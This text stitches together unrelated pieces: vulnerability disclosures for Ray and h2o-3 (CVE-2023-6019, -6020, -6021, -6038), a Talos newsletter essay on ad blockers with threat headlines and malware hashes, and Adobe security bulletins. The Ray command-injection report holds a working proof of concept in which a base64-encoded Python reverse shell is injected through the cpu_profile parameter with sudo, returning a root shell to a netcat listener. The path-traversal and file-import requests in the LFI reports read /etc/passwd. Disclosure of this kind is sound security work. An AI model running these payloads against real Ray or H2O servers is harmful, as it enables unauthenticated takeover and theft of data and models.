LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.

**Description**

Local file include allows remote attackers to make an unauthenticated API call and read any file on the system, such as SSH keys.

**Proof of Concept**

    GET /static/js/../../../../../../../../../../../../../../etc/passwd HTTP/1.1
    Host: localhost:8265
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost:8265/
    Sec-Fetch-Dest: script
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Site: same-origin
    
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Etag: "174880dae894b157-2020"
    Last-Modified: Thu, 02 Mar 2023 04:48:59 GMT
    Content-Length: 8224
    Accept-Ranges: bytes
    Date: Thu, 24 Aug 2023 23:01:58 GMT
    Server: Python/3.8 aiohttp/3.8.5
    Connection: close
    
    ##
    # User Database
    # 
    # Note that this file is consulted directly only when the system is running
    # in single-user mode.  At other times this information is provided by
    # Open Directory.
    #
    # See the opendirectoryd(8) man page for additional information about
    # Open Directory.
    ##
    nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
    root:*:0:0:System Administrator:/var/root:/bin/sh
    daemon:*:1:1:System Services:/var/root:/usr/bin/false
    fakeuser:*:99:99:Fake User:/Users/danmcinerney/fakeuser:/bin/sh
    _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
    _taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false
    [...]
    

**Impact**

Allows attackers to read any file on the server depending on the permissions Ray was run with.

**Occurrences**

CVE-2023-6020: LFI in Ray API - GET /static/ in ray

YouTube’s new rules may not be around for long anyway, because they might run afoul of European Union regulations

Thursday, November 16, 2023 14:00

I don’t think this is a particularly bold take — but I’m not afraid to say that ad blockers are good! 

Ever since I started using one sometime in 2016, my experience of using the internet has improved exponentially. I can finally easily find a recipe for dinner on a random influencer’s blog, get a faster answer to “how to replace my car’s headlights” and likely avoid hundreds of pieces of malvertising. 

But their use has increasingly come into question with YouTube’s new policies on preventing users from using ad blockers on its site, with new warnings saying the user has a certain number of videos they can watch before they must allowlist youtube.com in their ad blocker, thus allowing the site to display ads before YouTube videos. 

The second this popped up for me two weeks ago, I immediately started researching workarounds and quickly found a secure solution that works for my browsing habits. The easy explanation for why Google (YouTube’s parent company) wants to get rid of ad blockers is, simply, money. They run the Google Ads service that provides the stereotypical ads everyone has been used to seeing on websites since the early aughts. Unfortunately, bad actors will often use enticing headlines, fake images or sales pitches to trick people into clicking on links that lead to malicious sites, attacker-run scams or downloads that are malware. 

Ad blockers are a major tool users can deploy to block this type of threat, so the explanation for why everyone should be using one is also clear. 

Google isn’t the only major company looking to bypass ad blockers, either. Spotify’s terms of service explicitly outlaws “circumventing or blocking advertisements or creating or distributing tools designed to block advertisements” on its platforms, and many news websites like CNBC have warnings about turning off your ad blocker before you can proceed to read an article. 

I am all for publishers charging for their content or putting it behind a paywall, or even “premium” subscriptions to disable ads from podcasts or videos. But we all need to universally agree that ad blockers (at least legitimate ones) are good for the internet at large and keep users safer. The FBI and CIA agree with me on this and have both advised that users enable ad blockers in web browsers before.

The argument that ads benefit the creators, and therefore we’re robbing them of money, is largely off-base from these corporations. 

Creators who are part of the YouTube Partner program, which means they have filled out an application and meet a minimum standard for views and subscribers, make between $1.61 and $29.30 for every 1,000 views on their videos through YouTube’s ads. So Mr. Beast might make a decent payday out of that every month, but I’m sure Mr. Beast would also be doing just fine without the extra few thousand dollars in his pocket currently. 

The people who are just trying to be helpful by showing me how to fix my washing machine or install a car seat properly are likely not missing my singular ad view when I use an ad blocker.  

Thankfully, YouTube’s new rules may not be around for long anyway, because they might run afoul of European Union regulations, and privacy advocates have already filed a formal challenge to the EU’s independent data regulator.  

**The one big thing **

Microsoft disclosed three zero-day vulnerabilities as part of its monthly security update this week, and all three have already been added to CISA’s Known Exploited Vulnerabilities catalog. However, Patch Tuesday only included three critical vulnerabilities, an unusually small number based on previous months’ Patch Tuesdays. CVE-2023-36033 is an elevation of privilege vulnerability in the Windows DWM Core Library that could allow an attacker to gain SYSTEM-level privileges. According to Microsoft, this vulnerability has already been exploited in the wild and there is proof-of-concept code available. Another zero-day elevation of privilege vulnerability, CVE-2023-36036, exists in the Windows Cloud Files mini-filter driver that could also allow an attacker to gain SYSTEM privileges. 

**Why do I care? **

Unfortunately, zero-days have become commonplace for Patch Tuesdays this year, and it seems like a few more pop up each month. In these cases, attackers were able to discover the exploits before Microsoft had a chance to patch them, and CISA already acknowledged that attackers are exploiting these vulnerabilities in the wild.  

**So now what? **

All Microsoft users should ensure their updates are installed correctly if you have auto-update on, or make sure to manually download the patches as soon as possible otherwise. The Talos blog also has a rundown of Snort rules that can detect the exploitation of many of the vulnerabilities Microsoft disclosed this week. 

**Top security headlines of the week **

**U.S. intelligence agencies are warning that the Royal ransomware group could soon be headed for a rebrand and may already be operating under the name “BlackSuit.”** Government sanctions have previously limited Royal’s ability to make money off their ransomware attacks, but new research from private firms and government agencies indicate that Royal may be connected to BlackSuit, another threat actor that uses similar open-source tools. Royal is a prolific ransomware group that the FBI says is responsible for infecting more than 350 companies, generating revenue in excess of $275 million. Security researchers are also speculating that Royal may have formed from the splintering of the former Conti ransomware gang, which was also the victim of sanctions and government takedown efforts. The U.S. and U.K. announced sanctions against 11 individuals believed to be a part of Conti in September. (TechCrunch, The Register) 

**Fighting election misinformation has only gotten more difficult since the 2020 presidential election.** New reporting and testimony indicate that many key programs and partnerships dedicated to fighting fake news and disinformation online have eroded over the past few years after political attacks from right-wing leaders and organizations. FBI Director Chris Wray told a Senate committee last week that an alliance of federal agencies, tech companies, election officials and security researchers dedicated to fighting foreign propaganda has fallen apart recently, with little to no communication between the various parties involved. Other officials in charge of fighting election disinformation say its been months since they heard from the FBI after once connecting with the agency regularly about fighting fake news on social media platforms. Additionally, many poll workers and election officials are afraid to discuss the topic after years of online pushback from right-wing voters who view the word “misinformation” as a synonym for censorship. (NBC News, NPR) 

**Chip makers Intel and AMD disclosed new vulnerabilities this week that could lead to privilege escalation.** Some Intel CPUs are vulnerable to the newly discovered “Reptar” vulnerability (CVE-2023-23583) that was disclosed on Tuesday. Adversaries can exploit this high-severity flaw if they already have access to the targeted system, eventually causing a crash on the machine leading to privilege escalation or the disclosure of sensitive system information. Another attack on AMD CPUs called “CacheWarp” could allow an attacker to infiltrate encrypted virtual machines and perform privilege escalation. This vulnerability, identified as CVE-2023-20592, affects AMD's Secure Encrypted Virtualization (SEV) technology. Users do not need to take any additional actions to address these vulnerabilities other than ensuring drivers and operating systems are up-to-date and patched. (SecurityWeek, The Hacker News) 

**Can’t get enough Talos? **

Rather than putting a bunch of links here this week, I instead encourage you to watch this whole segment from Fox 11 in Los Angeles, featuring Nick Biasini from Talos Outreach. The story covers online scams, but features Nick discussing Talos’ recent research into various scams in the online video game “Roblox.” 

**Upcoming events where you can find Talos **

**misecCON** **(Nov. 17)** 

_Lansing, Michigan_ 

> _Terryn Valikodath from Talos Incident Response will deliver a talk providing advice on the best ways to conduct analysis, learning from his years of experience (and mishaps). He will speak about the everyday tasks he and his Talos IR teammates must go through to properly perform analysis. This talk covers topics such as planning, finding evil, recording findings, correlation and creating your own timelines._ 

**"Power of the Platform” by Cisco** **(Dec. 5 & 7)** 

_Virtual (Please note: This presentation will only be given in German)_ 

> _The annual IT event at the end of the year where Cisco experts, including Gergana Karadzhova-Dangela from Cisco Talos Incident Response, discuss the future-oriented topics in the implementation of digitalization together with you._  

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** b9ddbd1a4cec61e6b022a275d66312b5b676f9a0a9537a7708de9aa8ce34de59   
**MD5:** 3b100bdcd61bb1da816cd7eaf9ef13ba   
**Typical Filename:** vt-upload-C6In1   
**Claimed Product:** N/A    
**Detection Name:** Backdoor:KillAV-tpd 

**SHA 256:** 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab   
**MD5:** 4c648967aeac81b18b53a3cb357120f4   
**Typical Filename:** yypnexwqivdpvdeakbmmd.exe   
**Claimed Product:** N/A    
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a   
**MD5:** 200206279107f4a2bb1832e3fcd7d64c   
**Typical Filename:** lsgkozfm.bat   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::tpd

We all just need to agree that ad blockers are good

A command injection exists in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication.

**Description**

The Ray Project dashboard contains a CPU profiling page, and the format parameter is not validated before being inserted into a system command executed in a shell, allowing for arbitrary command execution. If the system is configured to allow passwordless sudo (a setup some Ray configurations require) this will result in a root shell being returned to the user. If not configured, a user level shell will be returned:

**Proof of Concept**

For this proof of concept, the attacker machine is 192.168.200.177 and the victim Ray dashboard is 192.168.200.204.

****Victim Ray dashboard ray_dashboard.py (192.168.200.204)****

    #!/usr/bin/env python3
    import ray
    context = ray.init(dashboard_host="0.0.0.0")
    print(context.dashboard_url)
    

and run like so:

    python3 -i ray_dashboard.py
    

****Attacker machine (192.168.200.177)****

    user@attacker:~$ nc -lvvp 4444 &
    Listening on 0.0.0.0 4444
    # python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.200.177",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])' == cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE5Mi4xNjguMjAwLjE3NyIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSkn
    user@attacker:~$ curl 'http://192.168.200.204:8265/worker/cpu_profile?pid=3354&ip=192.168.200.204&duration=5&native=0&format=`echo%20cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE5Mi4xNjguMjAwLjE3NyIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSkn|base64$IFS-d|sudo%20sh`'
    Connection received on 192.168.200.204 57436
    # id
    uid=0(root) gid=0(root) groups=0(root)
    # whoami
    root
    # hostname
    ray
    

**Impact**

Exploiting this vulnerability allows for a complete remote compromise of the system running the Ray dashboard, including model theft & alteration, total data compromise, and persistent access to an attacker. Ray has specific setup cases for setup with a passwordless sudo, giving the attacker root access. If Ray is not configured for passwordless sudo, the attacker will receive access in the same account the dashboard was run. Both allow for model model theft & alteration, total data compromise, and persistent access to an attacker.

**Occurrences**

profile\_manager.py L86-L114

This is the vulnerable function containing the unverified format parameter. Allow-listing this to a boolean, known good values, or a highly filtered string type will fix this vulnerability

CVE-2023-6019: Code injection in cpu_profile format parameter in ray

An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.

**Description**

Local file include in h2o-3 REST API. Unauthenticated, remote, no user interaction, default installation.

**Proof of Concept**

Start the h2o-3 API with:

    cd h2o-3.40.0.4
    java -jar h2o.jar
    

Then make these curl requests:

    curl -i -s -k -X $'GET' \
        -H $'Host: 127.0.0.1:54321' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' -H $'Referer: http://127.0.0.1:54321/flow/index.html' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \
        $'http://127.0.0.1:54321/3/ImportFiles?path=%2Fetc%2Fpasswd'
    

    curl -i -s -k -X $'POST' \
        -H $'Host: 127.0.0.1:54321' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 50' -H $'Origin: http://127.0.0.1:54321' -H $'Connection: close' -H $'Referer: http://127.0.0.1:54321/flow/index.html' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \
        --data-binary $'source_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D' \
        $'http://127.0.0.1:54321/3/ParseSetup'
    

The response:

    HTTP/1.1 200 OK
    Connection: close
    Date: Thu, 08 Jun 2023 15:10:27 GMT
    Cache-Control: no-cache
    X-h2o-build-project-version: 3.40.0.4
    X-h2o-rest-api-version-max: 3
    X-h2o-cluster-id: 1686167537026
    X-h2o-cluster-good: true
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-Content-Type-Options: nosniff
    Content-Security-Policy: default-src 'self' 'unsafe-eval' 'unsafe-inline'; img-src 'self' data:
    Content-Type: application/json
    Content-Length: 1457
    
    {"__meta":{"schema_version":3,"schema_name":"ParseSetupV3","schema_type":"ParseSetup"},"_exclude_fields":"","source_frames":[{"__meta":{"schema_version":3,"schema_name":"FrameKeyV3","schema_type":"Key<Frame>"},"name":"nfs://etc/passwd","type":"Key<Frame>","URL":"/3/Frames/nfs://etc/passwd"}],"parse_type":"CSV","separator":32,"single_quotes":false,"check_header":-1,"column_names":null,"skipped_columns":null,"column_types":["String","Enum"],"na_strings":null,"column_name_filter":null,"column_offset":0,"column_count":0,"destination_frame":"passwd.hex","header_lines":0,"number_columns":2,"data":[["nobody:*:-2:-2:Unprivileged","User:/var/empty:/usr/bin/false"],["root:*:0:0:System","Administrator:/var/root:/bin/sh"],["daemon:*:1:1:System","Services:/var/root:/usr/bin/false"],["fakeuser:*:99:99:Fake","User:/Users/danmcinerney/fakeuser:/bin/sh"],["_uucp:*:4:4:Unix","to","Unix","Copy","Protocol:/var/spool/uucp:/usr/sbin/uucico"],["_taskgated:*:13:13:Task","Gate","Daemon:/var/empty:/usr/bin/false"],["_networkd:*:24:24:Network","Services:/var/networkd:/usr/bin/false"],["_installassistant:*:25:25:Install","Assistant:/var/empty:/usr/bin/false"],["_lp:*:26:26:Printing","Services:/var/spool/cups:/usr/bin/false"],["_postfix:*:27:27:Postfix","Mail","Server:/var/spool/postfix:/usr/bin/false"]],"warnings":null,"chunk_size":4194304,"total_filtered_column_count":2,"custom_non_data_line_markers":null,"decrypt_tool":null,"partition_by":null,"escapechar":0}
    

Developers have been contacted 06/08/2023:

    H2O Support
        
    Wed, Jun 7, 4:32 PM (18 hours ago)
        
    to me
    
    Dear Dan McInerney,
    
    We would like to acknowledge that we have received your request for support and a ticket has been created. A support representative will be reviewing your request and will send you a personal response.
    Your ticket id is :  [#105551] 
    
    
    To view the status of the ticket or add comments, please visit
    https://support.h2o.ai/helpdesk/tickets/105551
    
    Your problem description is as below:
    
    The h2o-3 API has an LFI. You can read any file on the filesystem with import and parse commands. By default the API initializes without authentication and is remotely accessible to anyone on the local network, or the world at large if the user publicly exposed the endpoint.
    
    
    
    
    
    Ticket attachments : 1. lfi id rsa.png
    2. Screenshot 2023-06-07 at 4.31.34 PM.png
    
    
    Thank you for your patience.
    
    Sincerely,
    H2O.ai Support Team
    

**Impact**

Remotely accessing every file on the API server with the permissions of the user who ran the command.

**Occurrences**

CVE-2023-6038: LFI in h2o-3 API in h2o-3

LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.

**Description**

Attackers can read any file on the system with the permissions of the user that started the Ray Dashboard.

**Proof of Concept**

    GET /api/v0/logs/file?node_id=56424ecdb00cf570f0831aa698dd7c44e527a20212d2fa27078c7f79&filename=../../../../../etc%2fpasswd&lines=50000 HTTP/1.1
    Host: localhost:8265
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost:8265/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    HTTP/1.1 200 OK
    Content-Type: text/plain
    Date: Thu, 24 Aug 2023 21:49:54 GMT
    Server: Python/3.8 aiohttp/3.8.5
    Connection: close
    Content-Length: 8225
    
    1##
    # User Database
    # 
    # Note that this file is consulted directly only when the system is running
    # in single-user mode.  At other times this information is provided by
    # Open Directory.
    #
    # See the opendirectoryd(8) man page for additional information about
    # Open Directory.
    ##
    nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
    root:*:0:0:System Administrator:/var/root:/bin/sh
    daemon:*:1:1:System Services:/var/root:/usr/bin/false
    fakeuser:*:99:99:Fake User:/Users/danmcinerney/fakeuser:/bin/sh
    _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
    

**Impact**

Allows attackers to remotely read any file on the system depending on the permissions of the user that started Ray.

**Occurrences**

CVE-2023-6021: LFI in Ray API in ray

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Updates Available for Adobe Audition | APSB23-64

Bulletin ID

Date Published

Priority

ASPB23-64

November 14, 2023             

3

**Summary**

Adobe has released an update for Adobe Audition for Windows and macOS. This update resolves critical, important and moderate arbitrary code execution and memory leak vulnerabilities.  

**Affected Versions**

**Product**

**Version**

**Platform**

Adobe Audition  

24.0 and earlier versions

Windows and macOS

Adobe Audition  

23.6.1 and earlier versions          

Windows and macOS

**Solution**

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version via the Creative Cloud desktop app’s update mechanism.  For more information, please reference this help page.

Product

Version

Platform

Priority Rating

**Availability**

Adobe Audition  

24.0.3  

Windows and macOS

3

Download Center      

Adobe Audition  

23.6.2  

Windows and macOS

3

Download Center      

For managed environments, IT administrators can use the Admin Console to deploy Creative Cloud applications to end users. Refer to this help page for more information.

**Vulnerability Details**

Vulnerability Category

Vulnerability Impact

Severity

**CVSS base score**    

**CVSS vector**   

CVE Numbers

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2023-47046  

Access of Uninitialized Pointer (CWE-824)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2023-47047  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2023-47048  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  

CVE-2023-47049  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  

CVE-2023-47050  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  

CVE-2023-47051  

Out-of-bounds Read (CWE-125)  

Memory leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2023-47052  

Access of Uninitialized Pointer (CWE-824)  

Memory leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2023-47053  

Access of Uninitialized Pointer (CWE-824)  

Memory leak

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2023-47054  

**Acknowledgments**

Adobe would like to thank the following researchers for reporting this issue and for working with Adobe to help protect our customers.          

*   Mat Powell of Trend Micro Zero Day Initiative - CVE-2023-47046, CVE-2023-47047, CVE-2023-47048, CVE-2023-47049, CVE-2023-47050, CVE-2023-47051, CVE-2023-47052, CVE-2023-47053, CVE-2023-47054
    
    NOTE: Adobe has a private, invite-only, bug bounty program with HackerOne. If you are interested in working with Adobe as an external security researcher, please fill out this form for next steps.
    

**Revisions**

  
October 28, 2021: Added row to solution table for N-1 version.

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com

CVE-2023-47054: Adobe Security Bulletin

Adobe InCopy versions 18.5 (and earlier) and 17.4.2 (and earlier) are affected by are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Update Available for Adobe InCopy | APSB23-60

**Bulletin ID**

**Date Published**

**Priority**

APSB23-60

November 14, 2023

3

**Summary**

Adobe has released a security update for Adobe InCopy.  This update addresses a critical vulnerability. Successful exploitation could lead to arbitrary code execution.                    

**Affected versions**

18.5 and earlier versions  

17.4.2 and earlier versions        

**Solution**

Adobe categorizes these updates with the following priority rating and recommends users update their software installations via the Creative Cloud desktop app updater, or by navigating to the InCopy Help menu and clicking "Updates." For more information, please reference this help page.

**Product**

**Updated version**

**Platform**

**Priority rating**

Adobe InCopy   

19.0  

Windows  and macOS    

3

Adobe InCopy   

18.5.1  

Windows  and macOS    

3

For managed environments, IT administrators can use the Creative Cloud Packager to create deployment packages. Refer to this help page for more information.

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**    

**CVSS vector**   

**CVE Number**

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical 

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-26368  

**Acknowledgments**

Adobe would like to thank the following researchers for reporting this issue and for working with Adobe to help protect our customers.  

*   Michael Heinzl -- CVE-2023-26368  
    

NOTE: Adobe has a private, invite-only, bug bounty program with HackerOne. If you are interested in working with Adobe as an external security researcher, please fill out this form for next steps.

\-------------------------------------------------------------------------------------------------------------------------------------------------

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com

CVE-2023-26368: Adobe Security Bulletin

Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available for Adobe Photoshop | APSB23-56

Adobe has released an update for Photoshop for Windows and macOS. This update resolves critical and important vulnerabilities.  Successful exploitation could lead to arbitrary code execution and memory leak.   

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version via the Creative Cloud desktop app’s update mechanism.  For more information, please reference this help page.    

For managed environments, IT administrators can use the Admin Console to deploy Creative Cloud applications to end users. Refer to this help page for more information.

Adobe would like to thank the following researcher for reporting this issue and for working with Adobe to help protect our customers:   

anonymous - CVE-2023-44330, CVE-2023-44331, CVE-2023-44332, CVE-2023-44333, CVE-2023-44334, CVE-2023-44335

NOTE: Adobe has a private, invite-only, bug bounty program with HackerOne. If you are interested in working with Adobe as an external security researcher, please fill out this form for next steps.  

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2023-44335: Adobe Security Bulletin

Adobe Bridge versions 13.0.4 (and earlier) and 14.0.0 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Updates Available for Adobe Bridge | APSB23-57

Bulletin ID

Date Published

Priority

APSB23-57

November 14, 2023  

3

**Summary**

Adobe has released a security update for Adobe Bridge. This update addresses moderate vulnerabilities that could lead to memory leak.  

**Affected Versions**

**Product**

**Version**

**Platform**

Adobe Bridge    

13.0.4 and earlier versions   

Windows  and macOS

Adobe Bridge    

14.0.0 and earlier versions 

Windows  and macOS  

**Solution**

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version via the Creative Cloud desktop app's update mechanism.  For more information, please reference this help page.   

Product

Version

Platform

Priority     

Availability      

Adobe Bridge    

13.0.5  

Windows and macOS    

3

Download Page    

Adobe Bridge    

14.0.1  

Windows and macOS      

3

Download Page      

**Vulnerability Details**

Vulnerability Category

Vulnerability Impact

Severity

**CVSS base score**  

**CVSS vector**

CVE Numbers

Access of Uninitialized Pointer (CWE-824)  

Memory leak

Moderate   

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2023-44327  

Use After Free (CWE-416)  

Memory leak

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2023-44328  

Access of Uninitialized Pointer (CWE-824)  

Memory leak  

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2023-44329  

**Acknowledgments**

Adobe would like to thank the following researcher for reporting this issue and for working with Adobe to help protect our customers:    

*   Mat Powell of Trend Micro Zero Day Initiative - CVE-2023-44327, CVE-2023-44328, CVE-2023-44329  
    

NOTE: Adobe has a private, invite-only, bug bounty program with HackerOne. If you are interested in working with Adobe as an external security researcher, please fill out this form for next steps.

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com

CVE-2023-44329: Adobe Security Bulletin

Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Updates Available for Adobe Media Encoder | APSB23-63

Bulletin ID

Date Published

Priority

APSB23-63

November 14, 2023     

3

**Summary**

Adobe has released an update for Adobe Media Encoder.  This update resolves critical and moderate vulnerabilities that could lead to arbitrary code execution and memory leak.  

**Affected Versions**

**Product**

**Version**

**Platform**

Adobe Media Encoder

24.0.2 and earlier versions  

Windows and macOS

Adobe Media Encoder

23.6 and earlier versions  

Windows and macOS

**Solution**

Adobe categorizes these updates with the following  priority ratings and recommends users update their installation to the newest version via the Creative Cloud desktop app's update mechanism.  For more information, please reference this help page.

Product

Version

Platform

Priority

Adobe Media Encoder

24.0.3  

Windows and macOS

3

Adobe Media Encoder

23.6.2  

Windows and macOS

3

For managed environments, IT administrators can use the Admin Console to deploy Creative Cloud applications to end users. Refer to this help page for more information.

**Vulnerability Details**

Vulnerability Category

Vulnerability Impact

Severity

**CVSS base score**   

**CVSS vector**  

CVE Numbers

Out-of-bounds Read (CWE-125)  

Arbitrary code execution   

Critical     

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-47040

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2023-47041

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2023-47042  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-47043

Access of Uninitialized Pointer (CWE-824)  

Memory leak  

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2023-47044  

**Acknowledgments**

Adobe would like to thank the following for reporting these issues and for working with Adobe to help protect our customers: 

*   Mat Powell of Trend Micro Zero Day Initiative - CVE-2023-47040, CVE-2023-47041, CVE-2023-47042, CVE-2023-47043, CVE-2023-47044
    
    NOTE: Adobe has a private, invite-only, bug bounty program with HackerOne. If you are interested in working with Adobe as an external security researcher, please fill out this form for next steps.  
    

